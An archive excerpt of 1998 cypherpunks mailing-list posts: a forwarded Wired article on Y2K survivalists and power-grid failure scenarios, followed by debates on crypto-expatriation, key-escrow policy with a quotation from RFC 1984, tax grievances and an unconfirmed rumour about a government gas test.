250 cross-posts to misc.survivalism - up from an average of 30 a month in
late 1997. Gradually, a new acronym entered the Internet lexicon:
TEOTWAWKI, pronounced "tee-OH-tawa-kee." The End of the World as We Know
It. The
 Internet's very own survival movement was born.

 Scott Olmsted has known about the Y2K bug since the 1980s, but he never
gave it much thought until early 1997, when he received a snail-mail flyer
from Gary North, a historian and early leader in the Y2K preparedness
movement. After reading it, Scott remembers feeling a vague sense of dread.
But as a rational guy and student of decision analysis - the science of
logical decision making in the face of chronic uncertainty - he didn't jump
to any conclusions. Instead, he went online to do some research. As he
pored over Web sites and news clippings, Scott felt himself moving through
the same psychological stages endured by people confronted with fatal
illness: denial, fading into anger, leading to a deep depression that
culminates in a sense of acceptance. "I'm still not 100 percent sure that
the world's coming to an end," he admits. "But the idea that I may want to
get out of town for a while is not such a long shot. It's enough to make me
want to prepare."

 With the exception of his wife, most of the non-geeks closest to Scott
think he's a little nuts. His half-brother, Clark Freeman, thought he was
going overboard. But since then, Clark has come around a bit - he, too, is
planning to stockpile some food in case things get rough.

 If his brother is taking Y2K so seriously, he figures there might well be
something to it. "Scott has always been the level-headed one," Clark
remembers. "The classic straightlaced nerd."

 "I've spoken with friends and relatives about this, and I've gotten
nowhere," Scott sighs. Worse, some of the more intense Y2K survivalists
also think he's crazy - or at least a bit nave. After all, Scott plans to
celebrate New Year's Eve at his home in the suburbs; the place in the
desert will be there just in case things get rough. Then there's his fence
- it has no perimeter alarms, and he isn't even trying to camouflage his
location. But worst of all, his hideaway is only a half tank of gas away
from Los Angeles - close enough to the big city that he could wake up one
postapocalyptic morning to find hordes of Los Angelinos parked outside his
desert redoubt.

 The hardcores believe it will happen like this: On January 1 (or shortly
thereafter), the electricity grid will go dead. Groceries in America's
refrigerators will go bad. Food distribution systems will crash and store
shelves will go bare within days. Businesses will fail, either because they
aren't Y2K compliant or because they are dependent on noncompliant
customers and suppliers. As losses mount and companies go under, the stock
market will plummet. Banks will calculate interest for negative 100 years.
The government will stop issuing entitlement checks to gray-haired senior
citizens when their age suddenly clicks back to -35. Panic will set in.
Police dispatch systems will be crippled, and the only law will be the law
of the jungle. Desperate citizens will abandon the cities to hunt for
resources in rural areas. They'll come looking for the mad prophets - the
Y2K survivalists - ready to plunder their food, their heat, and their
communications links. They'll zero in on Scott and his conspicuous retreat
like a pack of wolves on the scent of a kill.

 But they'd better stay away from Steve Watson's place.

 Steve Watson, a 45-year-old systems analyst, is still kicking himself for
not preparing sooner. He didn't get going until early this year, and he
worries that he still has a lot of adjusting to do. As he puts it, "I
didn't even know how to tan a hide until a couple of months ago."

 If all goes according to plan, Steve will ring in the new year at a secure
compound somewhere in southern Oklahoma. While the Pollyannas of the world
watch Times Square on the tube, he'll be listening to the radio for early
news of Y2K disaster. When the power goes black - perhaps at the stroke of
midnight - he'll be ready with a small arsenal of guns. A generator will
power his bunker indefinitely, but no light will escape to the outside -
none of Steve's neighbors will even know that there is a survivalist in
their midst.

 Eight months ago, if you'd told Steve that Y2K survivalism would become
his obsession, he would have laughed in your face. Last year, he was a
happy-go-lucky Y2K project analysis manager for DMR Consulting, a
Canada-based computer consulting firm, just finishing up a big remediation
project for a major American phone company. The effort was grueling - 10
writers, programmers, and analysts cleaning up 10 million of lines of Cobol
code. But in the end it all worked out, and the phone company's billing
system was declared ready for 2000.

 In that heady moment of self-congratulation, Bill Finch, one of Steve's
coworkers, approached him with a thought. "Steve," he said, "don't you
realize that everything stops if the power grid goes down?"

 Anxiety set in. The telephone company had poured substantial resources
into its Y2K effort. Even then, Steve's project had been an odyssey plagued
with countless unexpected glitches and snags. If the power utilities - with
their Byzantine grid of thousands of generators and substations around the
continent - weren't already well along in their efforts, then all the
systems he'd dragged into Y2K compliance would be dead as doornails when
the lights went out.

 That afternoon, Steve hit the Net, where he learned that the situation is
far worse than he had imagined. The power grid relies on a sophisticated
feedback mechanism: Remote terminal units report their power needs up the
communications chain that controls the output of electricity generators.
The entire network is riddled with embedded chips. Nuclear plants supply
nearly 20 percent of the power in the grid, and none of them have been
certified as Y2K compliant. Charles Siebenthal, head of the Year 2000
embedded systems project at the Electric Power Research Institute, says the
industry is just beginning to look for potential Y2K failure points.
Anecdotes from industry consultants suggest that if the year 2000 came
today, every utility in the country would crash. "No electric plant or
facility of any kind has been Y2K tested without some kind of impact," says
David Hall, a senior consultant with the Cara Corporation. "There isn't
enough time to fix everything. There will be some disruption. How long? How
deep? We just don't know."

 Then there are ripple effects to consider. "There's not a single railroad
switch in the country that's manual anymore," Steve says. "They're all
computer controlled, and railroads deliver coal and fuel to power plants."

 Exit Steve Watson, bright-eyed optimist; enter the new Steve Watson, Y2K
survivalist, rugged pioneer, and Renaissance man in training. Steve began
spending six hours a day on the Internet, studying alternative power,
construction techniques, and emergency medical procedures. Anything he
couldn't find online, he ordered from local bookstores or Amazon.com. He'd
never kept a gun in the house, but soon he had three: a 30-30 for deer
hunting, a .22 for small game, and a 9-mm handgun for personal protection.
Of course, the 9-mm is practically a popgun against looting mobs, so four
M-16 assault rifles are also on the way.

 Finally, he pooled his money with Bill Finch, his DMR coworker, to buy 500
remote acres in Oklahoma. (Bill holds the public deed to the property, so
his name has been changed in this article to keep the location secret.) In
choosing the hideaway site and its size, Steve overengineered to account
for family and friends - few of whom subscribe to his Y2K scenario. "Most
people think I'm nuts. Even my kids think, Dad's going off the deep end."
Steve's wife, Teresa, has been more supportive. She's no computer expert,
but her Baptist faith tells her that the Four Horsemen of the Apocalypse
could ride in with a global computer crash. Meanwhile, Steve is making
plans for everyone else: close friends, family members, sisters-in-law,
brothers-in-law - and their children, mothers, and fathers. Forty people in
all. In 2000, they'll work together to till the soil and patrol the fence
line.

 Steve's doomsday vision is the same as that of most Y2K radicals, but
radicals can pop up in some pretty mainstream places - like the US Central
Intelligence Agency, which is advising its agents abroad to keep cash on
hand and stockpile extra blankets in preparation for New Year's Day 2000.
The agency worries that bugs in the power networks and communications
backbones of developing nations could cause outages that would jeopardize
the safety and well-being of its agents.

 Millions of Americans have already gotten a small taste of critical system
failure. When the onboard control system of the Galaxy IV communications
satellite failed on Tuesday, May 19, 1998, the outage temporarily crippled
US pager networks, several broadcast news operations, and even credit card
verifications systems. Most of the disruptions were brief - technicians
were able to switch to backup communications paths - but doctors who use
pagers as a lifeline with patients and colleagues were forced to set up
camp in hospitals and offices. The failure of one satellite threw a wrench
into the mechanisms of modern life, perhaps providing a peek at what life
may be like at the dawn of the new millennium.

 Or sooner. While the full brunt of the Y2K bug is reserved for AD 2000,
some early problems are already developing. In 1996, Visa and MasterCard
temporarily stopped issuing credit cards with an expiration date of 2000
after credit card verification terminals began choking on the "00." The
gaffe led to customer complaints and a lawsuit filed by a suburban Detroit
grocery store against its computer supplier, TEC America Inc. Since then,
most verification systems have been upgraded, but Y2K is making its
presence known in other areas. The Information Technology Association of
America released a survey last March showing 44 percent of the US companies
they polled have already experienced Y2K failures. Ninety-four percent of
the respondents termed Y2K a "crisis."

 The GartnerGroup estimates that 180 billion lines of code need to be
examined and that 20 to 30 percent of all firms worldwide have not yet
started preparing for Y2K. Many of these are expected to suffer significant
failures. In a series of studies issued over the last year, Gartner
surveyed 15,000 companies in 87 countries to assess their Y2K readiness.
The results weren't encouraging. Small companies rated lowest - for most,
winning over new customers has taken priority over the Y2K problem. But
midsize and large companies are lagging, too. Gartner then rated the
overall Y2K efforts of industrialized nations on a scale of zero to five,
where five is total compliance on all systems. The highest scorers on the
scale, including the US, Canada, and Australia, rated somewhere between two
and three - a score that suggests they have completed an inventory of Y2K
vulnerabilities, but not yet developed a comprehensive remediation plan.

 The US may be at the front of the pack in the Y2K race, but that's small
comfort to some legislators. Last March, the House Subcommittee on
Government Management, Information, and Technology warned that 37 percent
of the critical systems used by federal agencies will not be ready in time.
Then in June, California Republican Stephen Horn, who heads the
subcommittee, issued a scathing report card on the Clinton administration's
Y2K progress. He gave the government an F.

 John Koskinen, head of the president's Year 2000 Conversion Council,
complains that Horn is just a tough grader. "As a government, we're in a C+
to B range," he argues. Koskinen keeps a digital desktop clock that runs
backward - on the day we spoke, the clock showed 609 days, 8 hours, 39
minutes, 16 seconds, and counting - but he generally refrains from calling
the situation a crisis. Instead, he describes it as a "critical management
challenge."

 He fully expects the federal government's critical systems to be ready on
time, or even early. "Many companies, financial institutions, and federal
agencies are still working on the problem," he says. "But most major
organizations plan to have their solutions in place by the first quarter of
next year."

 If the council is successful, Koskinen believes, Americans will confront
little more than a few minor inconveniences when the year 2000 finally
rolls around. "There's not enough information right now to indicate that
stocking up on Coleman stoves and Sterno is an appropriate response," he
says. And in the end, he predicts, "a lot of people won't notice."

 Koskinen has earned the respect of some Y2Kers by emphasizing the need for
high-level planning in the event that some systems fail. But Y2K
survivalists feel more comfortable with their own personal contingency
plans, and a commercial infrastructure is already forming to support them.
Walton Feed, an Idaho food distributor that sells products over the Net, is
doing a brisk business in long-term supplies; the company attributes this
to Y2K. And in Sully County, South Dakota, developer Russ Voorhees has
attracted national publicity and hundreds of potential clients for his
"Heritage Farms 2000" project - a Y2K survival community that's been on
hold since June, when a local planning commission refused to grant the
necessary building permits. For those who want to go it alone, there's a
sense of adventurous fun in their preparations - the pride of
self-sufficiency and an excuse to get away from the keyboard to earn some
merit badges. But Y2K preparedness is not just a Boy Scout fetish, and it
isn't always about getting away from it all.

 "If everybody moves to rural areas, they'll just take their problems with
them," explains Paloma O'Riley, a red-haired, forty-something mother, wife,
and computer expert. Paloma lives in the small town of Louisville,
Colorado, just east of Boulder, and when she looks around her community she
doesn't see potential looters - she sees neighbors. Her suburban hamlet has
become a major landmark on the Y2K map as the world headquarters of The
Cassandra Project, a grassroots Y2K preparedness organization that can
perhaps best be described as a kind of Millennial Neighborhood Watch.

 Until last year, Paloma was a Y2K project manager at the Rover Group, a
UK-based auto manufacturer, where her first responsibility was to identify
all of the company's vulnerable systems and target them for patching. But
her search didn't end with a couple of corporate mainframes. Inadvertently,
Paloma opened up the Pandora's Box of Y2K: embedded systems.

 Embedded systems draw the Y2K bug-fixing task out of cyberspace and into
the real world. There are lots of pea-brained microchips out there, nestled
in everything from microwave ovens and automobiles, to power plants and oil
refineries. Most don't care what the date is, but a small percentage of
them do, and that made Paloma nervous. "I became concerned about just how
prevalent embedded systems are," she recalls. "Several members of my family
have medical problems, so when I started investigating I became very
concerned about medical devices like defibrillators, physiological
monitoring equipment, and the entire medical services infrastructure."

 When her contract came up for renewal in 1997, Rover asked Paloma to stay
on in London to 2000. She declined - the thought of family and friends
surrounded by noncompliant systems that might leave them cold, hungry, and
without medical services was too much to ignore. Back in the States she
began networking with other people who shared her concerns, and that's when
she realized "we needed to put together an organization to address the
issues and get information out to the public."

 Thus The Cassandra Project was born. In Greek mythology, Cassandra was a
mortal woman courted by the god Apollo. To win her affections, Apollo gave
her the gift of prophecy. Still, Cassandra rejected him, so the frustrated
deity decreed that no one would ever believe her predictions. Paloma
O'Riley gave a nod to Cassandra's fate when she chose the name for her Y2K
preparedness group, but she is precisely the kind of mortal woman you'd
want at your next PTA meeting - a firm believer in the notion that some
good, old-fashioned community-building may keep the Y2K nightmare at bay.

 The Cassandra Project has helped spawn a dozen Y2K community preparedness
groups around the country. It has a board of directors that includes
several computer professionals and a Web site at millennia-bcs.com that
lists a menu of articles discussing possible Y2K scenarios, ranging from
minor annoyances to outright Y2Kaos. The site attracts more than 100,000
visitors a month.

 Between speaking engagements, Paloma spends her days organizing biweekly
meetings with neighbors to discuss contingency plans, and lobbying the
state government. "We've been working with the Cassandra group on a lot of
their initiatives," says Steve McNally, staff director of the Colorado
Information Management Commission. "They've talked to several legislators
and the governor's office and brought some awareness of the issues to the
table."

 For her part, Paloma and her family plan to stockpile a six-month supply
of food. Her worst-case scenarios look much the same as those of the most
hardcore, self-sufficient Y2K survivalists, but the bomb-shelter aspect is
conspicuously missing. Paloma believes that people will pull together in
times of turmoil. If calamity strikes and she is forced to draw the line,
she's determined to do so in her own backyard.

 Even if Paloma's neighborly pragmatism sets her apart from the militia
types and fundamentalist Christians who regularly contact The Cassandra
Project, her efforts have brought her in contact with a thriving
premillennial subculture. "People in other millennial movements, including
Christian fundamentalism, point to Y2K as a sign of the times," says Philip
Lamy, a professor of sociology and anthropology at Castleton College in
Vermont. Lamy specializes in the study of secular millennialism, and he
sees Y2K survivalism as a prime example of the genre. "Generally,
millennial movements appear when a society or culture is going through a
period of rapid cultural, economic, or technological change," he says. "The
explosion of the Internet and the World Wide Web is fueling a lot of this
now."

 Still, there are a few things that set the Y2Kers apart from the crowd.
For one, the Y2K bug is not simply a matter of myth, superstition, or
prophesy - it is a tangible problem hardwired into the fabric of our
industrial society. In addition, the people who are taking Y2K most
seriously are not laypeople or neophytes - they are specialized technicians
who approach the situation with a sophisticated understanding of society's
hidden machinery. But if heightened technical awareness alone could explain
the apocalyptic conclusions drawn by the Y2K survivalists, then every
well-informed computer geek would be moving to the desert - and that
clearly isn't happening. With so many intertwined variables to consider,
logic inevitably takes a back seat to subjective intuition - a personal
sense of security that extends from the microcosm of a single computer
program to the macrocosm of modern society. Ultimately it all comes down to
faith.

 But this, too, sets the Y2K survivalists apart. True millennialism is
rooted in faith - fundamentalist Christians may anticipate an apocalypse,
but they optimistically expect it to be followed by 1,000 years of
celestial rule. Y2K survivalism, on the other hand, doesn't concern itself
with redemption. It is antimillennial - the polar opposite of
techno-millennial movements like the Extropians who see technology as the
stairway to a higher plane. (See "Meet the Extropians," Wired 2.10, page
102.)

 "All this suggests that you don't have to be a religious fanatic, a
Christian fundamentalist, or a ufologist to believe that our world may be
in trouble - that there's something serious afoot in our nation and our
world," Lamy adds. "The Y2K problem is overlapping with other survivalist
movements, and like them it shares a kind of a fatalistic vision of the
future."

 Three weeks have passed since Scott Olmsted put the carpet installers to
work in his retreat. The carpet is in now, and he's turned his attention to
other details, like night-vision equipment - his property is on high
ground, and with the right hardware he could scan most of the valley from
his backyard. He's also thinking of getting laser eye surgery so that he
won't be dependent on contact lenses after 2000. It never seems to end.
"Once you take the first steps to prepare, you basically admit that this is
big enough to do something about. And then you realize you should be doing
more."

 Scott has turned his back on denial - the blind faith that allows people
to live normal lives in the face of staggering complexity, risk, and
uncertainty. Instead, he's chosen to acknowledge his own vulnerability. As
he describes it, "I've always known that the economy is complex and that we
live on the end of a long chain of ships, planes, and 18-wheelers." Scott
sees how the Y2K bug could disrupt that chain, and like other resolute
souls - environmental activists, antiabortion protesters, and corporate
whistle-blowers to name a few - he, too, has been driven to act by the
clarity and intensity of his vision. The rest of us may be content without
quite so much awareness, but embracing the Bug has actually made Scott feel
better. "I know one guy who started taking Prozac when his denial fell
away," he says. "Taking action - doing something - really gets you out of
that."

 Scott admits there isn't enough evidence to prove he's right. But, he
insists, that's not the way to look at it. "There's not nearly enough
evidence pointing the other way to make me abandon my preparations," he
says. In a way, he's managed to optimize the Y2K problem - even if the new
millennium dawns without incident, his efforts will have yielded a supply
of inexpensive food, a new collection of practical skills, and a nice
vacation home in the country. It's an eminently logical win-win, and Scott
has taken comfort in that. "I'm not waiting until the ground is shaking to
prepare for the Y2K earthquake," he muses. "I'm going to be ready for an
8.5. I may look foolish if it turns out to be minor, but that's OK. That's
the nature of decisionmaking under uncertainty."

 Kevin Poulsen is a columnist for ZDTV.com .

 America Offline

 ( Inside the Great Blackout of '00 )

 "Most of the nation's power systems must be compliant, or they all go
down, region by region, in one gigantic, rolling blackout," warns Gary
North, keeper of the oldest, most notorious Y2K doomsday site on the Web.
If the lights go out at the dawn of the 21st century, North believes the
failure will be permanent, because the computers that control the grid will
be unfixable if there isn't power to run them. Thereafter, he argues, the
blackout will trigger the collapse of civilization.

 The North American grid is vulnerable to simultaneous failures. Generating
facilities in the US, Canada, and Mexico jointly move power through
high-tension lines that distribute electricity through four regional
interconnections. Within each region, if one facility goes offline, the
others compensate to pick up the slack. But there's not much spare capacity
built into the system; the North American Electric Reliability Council, a
group that is drawing up a timetable of Y2K fixes for the Department of
Energy, admits that if multiple generating facilities fail in one region,
this "may result in stressing the electric system to the point of a
cascading outage over a large area."

 This is how it could happen: A power station is equipped with safety
systems that deactivate steam boilers if they aren't maintained frequently.
Suppose maintenance was last performed in 1999, which an embedded chip
recorded as "99." Now it's the year 2000, so the chip subtracts the old
year, 99, from the new year, 00, and finds, amazingly, that maintenance was
last performed -99 years ago. Clearly this is an error, so the chip shuts
down all the boilers, just to be safe.

 Meanwhile, at another power station, a temperature sensor attached to a
transformer averages its readings over time. On January 1, 2000, the sensor
divides temperature by the year - which is expressed as "00" - and comes up
with an infinite value, triggering another shutdown signal. If small faults
like these knock out a half dozen facilities, the rest will go offline to
protect generators from burning out in a hopeless effort to meet the
growing demand.

 The distribution grid also has weak points. "We have at least 800
different types of embedded controls on the wires," explains Gary Steeves,
director of a Y2K project at TransAlta Utilities, the largest
investor-owned power company in Canada. "Some of the protective devices log
dates of faults in activity and can automatically take a component out of
service." If the same controller has been installed in thousands of remote
locations, and the chips share the same Y2K bug, they'll all fail
simultaneously.

 Most US power utilities refuse to comment on the likelihood of these
disasters, fearing litigation if they offer reassurances that turn out to
be wrong.

 Tim Wilson, publisher of Y2k News, worries about the nearly 9,000 small
regional companies that pull power off the grid at the local level.
"They're clueless as to what to do about Y2K," says Wilson. "They know they
have embedded chips, but they don't know where they are. If there's a power
shortage, rural areas may not be allowed to take power off the grid,
because cities could have a higher priority."

 This suggests an ironic scenario: Remote areas may remain dark for weeks
or months after January 1, 2000, leaving Y2K survivalists waiting in their
isolated cabins for the lights to come back on - while complacent urban
dwellers enjoy uninterrupted service.

 - Charles Platt

Copyright (c) 1993-98 The Cond Nast Publications Inc. All rights reserved.
Compilation Copyright (c) 1994-98 Wired Digital Inc. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 8 Sep 1998 10:55:57 +0800
To: "Kawika Daguio" <rah@shipwright.com, e$@vmeng.com
Subject: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <s5f44f00.017@aba.com>
Message-ID: <199809080254.TAA05443@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



At 08:24 PM 9/7/98 , Kawika Daguio wrote:
>Bob,
>
>The syllogism at the end of your post is exactly why I have spent the last 
>more than 5 years negotiating and lobbying and why we (FI's) and you 
>(everyone else) shouldn't worry about the impact of government policy on the 
>security of financial communications.  Market (macro and microeconomics 
>plays a bigger role than the government.

So that explains why the U.S. price for e.g., sugar, has exceed the world
price for sugar by 20-30% to as much as 50% for something like 20 years,
right?  Because government efforts at manipulating prices and policies are
useless?  This is, of course, but a single example.

Mr. Hettinga comments:

>Do people out there really think somebody like Gore's going to do a
crypto-amnesty someday?

Please.  Revoking one's citizenship, particularly for a better option- of
which there are many- is hardly the end of the world, and is unlikely to
make one a felon.  It will, in fact, prevent one from becoming one in this
case which is, of course, the point.  Using terms like "Crypto-amnesty" is
just inflammatory.

Mr. Hettinga further comments:

>I expect people who do this crypto-expat stuff are going to get their
>new passports refused at the U.S. border when they visit, and I think that
>things are going to get worse for them for a long time before they get
better.

Of course, this is nonsense.  I know several major U.S. tax offenders who
have several million in liens and civil judgements who return to the United
States on a regular basis, they just don't maintain assets there.  Further,
one of them just recently renewed his U.S. passport at the U.S. consulate
without incident.

Bottom line:  People don't become criminals in the United States because
they leave it.  Consider the ramifications of turning people away at the
border because they are engaged in completely legitimate commercial
practices abroad which are, none the less, undesirable in the United
States?  Christ, the U.S. can't even turn away well known but unconvicted
French Economic Intelligence experts at the border.

I am constantly amused at the attitude of Americans who are convinced that
anyone who lives outside of the "end-all-be-all of the civilized world"
must live in some third world country.  This too is nonsense.  If I were
jurisdiction shopping I'm not sure I'd pick a small African nation, as some
others have, because this state would be extremely unlikely to protect me
from the kind of nastiness that nations are expected to protect citizens
from.  Also, visa-free travel is a pretty big consideration.  Picking a
country not well established in this regard is folly.

Cryptography is the cutting edge of many things, but that situation is
quickly wavering.  It's not long before being a cryptographer is even less
profitable than it is today.  If plying your trade is important, waiting
around for "market forces" to convince the FBI that they have it all wrong
is probably not a good strategy.

Incidentally, if anyone needs assistance contacting the best migration
consultants around, I'd be happy to give you my views and make referrals.

Some of you who want a counterpoint based on something a bit more
substantial than provincial fear mongering might ask after Tim May, who I
recall considered departing the United States but decided against it for a
variety of reasons.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Sep 1998 10:02:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809072208.RAA05578@einstein.ssz.com>
Message-ID: <v04011715b21a3e440014@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:08 PM -0400 on 9/7/98, Jim Choate wrote:


> > Ridgeway told Eisenhower at the outset that Vietnam was a multi-million-man
> > war, and Eisenhower stayed out accordingly, throwing a few marginal
>people on
> > the ground to shut Lodge up. It took Testosterone Jack to get a
>Special-Forces
> > hard-on. Eventually he and Desktop Lyndon ended up screwing a pooch
> > instead of the commies.
>
> Balonely, do your research somewhere beside a bar. JFK had no intention of
> sending more troops in and every intention of withdrawing the troops that
> were there. There are two sources you can look at to verify this. The first
> is the troop count over time and the internal presidential memos to the
> Chiefs of Staff. Had JFK not been shot there would have been NO US troops in
> Vietnam by the end of '64.
>
> LBJ is the nit-wit who crewed the proverbial pooch.

I've got an idea. Go read Halverstam's "The Best and the Brightest", Jim,
and then tell me what bar I did my research in.

Cheers :-),
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@systemics.ai>
Date: Tue, 8 Sep 1998 10:23:10 +0800
To: "Kawika Daguio" <KDAGUIO@aba.com>
Subject: Re: e$: crypto-expatriatism
In-Reply-To: <s5f44f00.019@aba.com>
Message-ID: <E0zGDMC-00015h-00@arianrhod.systemics.ai>
MIME-Version: 1.0
Content-Type: text/plain



(note trimmed distribution ... cryptography certainly isn't appropriate
for any of this, and I doubt if dcsb is...)

Kawika Daguio said:
> I would prefer that folks kept us out of their fields of fire in the various > skirmishes occuring during the cryptocrusades and left us to manage the 
> policy for and the security of our space for ourselves and our customers.  

Banks and other financial intermediaries do not exist in a vacuum.  While
I agree that the banking/financial applications do drive the policy in
this field (I believe both you and Bob believe this), I do not agree that
the existing banks and financial intermediaries drive the policy.
Fundamentally, there are some changes which make old institutions irrelevant,
even if their functions are taken over by new institutions.  For a long time,
the Church handled intermediation between military powers.  Now, it's the UN.
Perhaps tomorrow, it will be the mutual fund managers, transnationals,
and news agencies.  

We all seem to agree that the government is irrelevant in the grand
scheme of things.

While I may be presuming incorrectly, I feel that the
ABA represents the accidental existing institutions, not the essence of 
financial institutions.  Thus, when you say you have spent 5 years
negotiating and lobbying, I presume you are doing so to allow the
existing institutions to fit into the new future.  You are not necessarily
helping the new future come into being in the essential sense by helping
existing institutions come to grips with essential reality.

I would argue that the reality of electronic commerce/cryptography, and
its effect upon the power relationship of individual vs. group, needs
no apologists, and indeed, no apologist can help it.  It is a fundamentally
new reality.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Aardvaak Connect Free" <info@aardvaak.co.uk>
Date: Tue, 8 Sep 1998 05:34:23 +0800
To: <cypherpunks@toad.com>
Subject: Your subscription request :cypherpunks@toad.com
Message-ID: <001ff2318210798WEB@www.telinco.net>
MIME-Version: 1.0
Content-Type: text/plain



Congratulations. Your request has been processed succesfully. However,
please allow up to 2 hours before trying to connect.

Login = FREE256974
Password = cypherpunk

-- Connect Free Information

To connect FREE to 33.6Kbps access or 28.8Kbps please use 0845 662 1009
To connect FREE to K56Flex access please use 0845 662 1109
To connect FREE to 56K X2 access please use 0845 662 1209
To connect FREE to 64K ISDN access please use 0845 662 1309


Why not return to http://www.aardvaak.co.uk/ww37.htm
and see how to create a stunning web site online and for free!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 8 Sep 1998 11:08:29 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: A question about gas warfare in San Fran in '66... (fwd)
Message-ID: <199809080324.WAA07929@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 07 Sep 1998 19:34:29 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: Re: A question about gas warfare in San Fran in '66...

> I assume that this is one of these anonymous source things. =20

Actualy no, Alex was showing some documents with government seals and such. I
haven't had a chance to contact him so far but intend to. The only way I
have of getting a hold of him is to call his talk show or his access tv
show. His next access show is tomorrow (Tue.) nite.

The gist was that some group within the US gov. did a test in some area of
San Fran. and several deaths occurred. It wasn't done with the knowledge or
permission of the Cali. or San Fran. officials as described by Alex to date.

As I find more info I'll pass it along.

[bunch of other peripheral drivel deleted]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 8 Sep 1998 13:40:58 +0800
To: cypherpunks@cyberpass.net
Subject: Tax silliness
In-Reply-To: <199809080254.TAA05443@cyberpass.net>
Message-ID: <v03130300b21a7226574d@[209.66.100.138]>
MIME-Version: 1.0
Content-Type: text/plain




Folks, I generally restrain myself from passing on all the various news
stories I see or read.

But tonight Fox News is reporting that the IRS has said it may seek to
assess "gift taxes" if the guy who recovered Mark McGwire's 61st home
baseball gives the ball back to Mark McGwire.

(The ball is said to have a street value, to museums or collectors, of
$250K or so. The 62nd home run ball, the one which breaks Maris' record,
will supposedly be worth more than a million bucks.)

So, the shmuck who got this ball faces taxes on an unrealized gain if he
never sells the ball. And he gets taxed if he hands the ball back to
McGwire.

He makes no money, but pays 30-40% of some theoretical value in taxes.

Those fuckers in D. C. need to be put out of our misery.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 8 Sep 1998 07:06:41 +0800
To: TSGman@earthlink.net
Subject: Re: KRAP is at it in the IETF
In-Reply-To: <002701bdda9f$84ec8430$89bffad0@tsg-laptop>
Message-ID: <199809072248.XAA08942@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Todd S. Glassey writes on dbs@philodox.com (digital bearer settlement) list:
> Let me start with the disclaimer since I am going to vehemently disagree
> with you - These are my own opinions and in no way reflect my companies or
> our clients Opinions, etc. etc. etc. -

[What company do you work for?  You disclaim about your "company" and
"clients" without mention of who they are?  (I like to know who the
GAKkers are, are you with securecomptuing.com also?)]

> So William - IMHO, you are missing the point totally. The IETF is an
> A-Political Organization investing in the development of technical standards
> to accomplish various networking services. As to the issue of Politic vs.
> Technology, by its actions alone, KRAP's demonstrated agenda with the IETF
> is purely technical and whether it is in furtherance of its external
> political agenda is really irrelevant to the IETF as and its established
> process as a whole.

I understood it this way: that IETF policy is not allow political
considerations to weaken or otherwise damage security functions in
IETF standards.  eg. No weak key lengths for to satisfy local
government politics etc.

Read RFC 1984.  I quote:

: KEYS SHOULD NOT BE REVEALABLE
: 
:    The security of a modern cryptosystem rests entirely on the secrecy
:    of the keys.  Accordingly, it is a major principle of system design
:    that to the extent possible, secret keys should never leave their
:    user's secure environment.  Key escrow implies that keys must be
:    disclosed in some fashion, a flat-out contradiction of this
:    principle.  Any such disclosure weakens the total security of the
:    system.
: 
: DATA RECOVERY
: 
:    Sometimes escrow systems are touted as being good for the customer
:    because they allow data recovery in the case of lost keys. However,
:    it should be up to the customer to decide whether they would prefer
:    the more secure system in which lost keys mean lost data, or one in
:    which keys are escrowed to be recovered when necessary.  Similarly,
:    keys used only for conversations (as opposed to file storage) need
:    never be escrowed.  And a system in which the secret key is stored by
:    a government and not by the data owner is certainly not practical for
:    data recovery.

This quoted point is kind of relevant here:

 "keys used only for conversations (as opposed to file storage) need
  never be escrowed"

Now we move on to your GAK apologist arguments...

> Remember also that it was the Government that was the primary
> subsidizer of said same network and everything that evolved the old
> 56k ARPANET into what the Public Internet is today.

